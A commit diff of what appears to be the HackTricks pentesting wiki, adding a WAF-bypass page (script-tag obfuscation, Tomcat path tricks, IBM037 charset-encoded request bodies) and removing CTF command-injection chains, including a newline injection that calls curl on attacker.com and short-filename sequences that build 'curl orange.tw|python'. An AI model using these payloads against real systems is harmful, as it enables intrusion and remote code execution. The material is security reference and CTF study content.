GitBook: [#3275] No subject

SUMMARY.md

@@ -320,6 +320,7 @@
   * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md)
   * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
   * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md)
+  * [WAF Bypass](network-services-pentesting/pentesting-web/waf-bypass.md)
   * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
   * [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
   * [werkzeug](network-services-pentesting/pentesting-web/werkzeug.md)

linux-hardening/useful-linux-commands/bypass-bash-restrictions.md

@@ -163,99 +163,6 @@ You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 ```
 
-### Bypass potential regexes
-
-```bash
-# A regex that only allow letters and numbers migth be vulnerable to new line characters
-1%0a`curl http://attacker.com`
-```
-
-### RCE with 5 chars
-
-```bash
-# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
-#Oragnge Tsai solution
-## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
-http://host/?cmd=>ls\
-http://host/?cmd=ls>_
-http://host/?cmd=>\ \
-http://host/?cmd=>-t\
-http://host/?cmd=>\>g
-http://host/?cmd=ls>>_
-
-## Step2: generate `curl orange.tw|python` to file "g"
-## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
-http://host/?cmd=>on
-http://host/?cmd=>th\
-http://host/?cmd=>py\
-http://host/?cmd=>\|\
-http://host/?cmd=>tw\
-http://host/?cmd=>e.\
-http://host/?cmd=>ng\
-http://host/?cmd=>ra\
-http://host/?cmd=>o\
-http://host/?cmd=>\ \
-http://host/?cmd=>rl\
-http://host/?cmd=>cu\
-http://host/?cmd=sh _
-# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
-
-## Finally execute the file "g"
-http://host/?cmd=sh g
-
-
-# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
-# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
-https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
-## Execute tar command over a folder
-http://52.199.204.34/?cmd=>tar
-http://52.199.204.34/?cmd=>zcf
-http://52.199.204.34/?cmd=>zzz
-http://52.199.204.34/?cmd=*%20/h*
-
-# Another curiosity if you can read files of the current folder
-ln /f*
-## If there is a file /flag.txt that will create a hard link 
-## to it in the current folder
-```
-
-### RCE with 4 chars
-
-```bash
-# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
-# it will follow the same principle of creating the command `ls -t>g` in a file
-# and then generate the full command in filenames
-# generate "g> ht- sl" to file "v"
-'>dir'
-'>sl'
-'>g\>'
-'>ht-'
-'*>v'
-
-# reverse file "v" to file "x", content "ls -th >g"
-'>rev'
-'*v>x'
-
-# generate "curl orange.tw|python;"
-'>\;\\'
-'>on\\'
-'>th\\'
-'>py\\'
-'>\|\\'
-'>tw\\'
-'>e.\\'
-'>ng\\'
-'>ra\\'
-'>o\\'
-'>\ \\'
-'>rl\\'
-'>cu\\'
-
-# got shell
-'sh x'
-'sh g'
-```
-
 ## Read-Only/Noexec Bypass
 
 If you are inside a filesystem with the **read-only and noexec protections** there are still ways to **execute arbitrary binaries**. One of them is by the use of **DDexec**, yo can find an explanation of the technique in:

network-services-pentesting/pentesting-web/waf-bypass.md

@@ -0,0 +1,62 @@
+# WAF Bypass
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+```bash
+# IIS, ASP Clasic
+<%s%cr%u0131pt> == <script>
+
+# Path blacklist bypass - Tomcat
+/path1/path2/ == ;/path1;foo/path2;bar/;
+
+# Charset encoding
+application/x-www-form-urlencoded;charset=ibm037
+multipart/form-data; charset=ibm037,boundary=blah
+multipart/form-data; boundary=blah; charset=ibm037
+
+##Python code
+import urllib
+s = 'payload'
+print(urllib.quote_plus(s.encode("IBM037"))
+
+## Request example
+GET / HTTP/1.1
+Host: buggy
+Content-Type: application/x-www-form-urlencoded; charset=ibm500
+Content-Length: 61
+
+%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
+
+```
+
+It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>

network-services-pentesting/pentesting-web/wordpress.md

@@ -299,15 +299,6 @@ Through Security Skills as a Service, we help organizations to **defend against
 {% embed url="https://securityhubs.io/" %}
 {% endhint %}
 
-## Get access by overwriting a bit
-
-More than a real attack this is a curiosity. IN the CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) you could flip 1 bit from any wordpress file. So you could flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation.
-
-```php
-    if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
-            return new WP_Error(
-```
-
 ## **Panel RCE**
 
 **Modifying a php from the theme used (admin credentials needed)**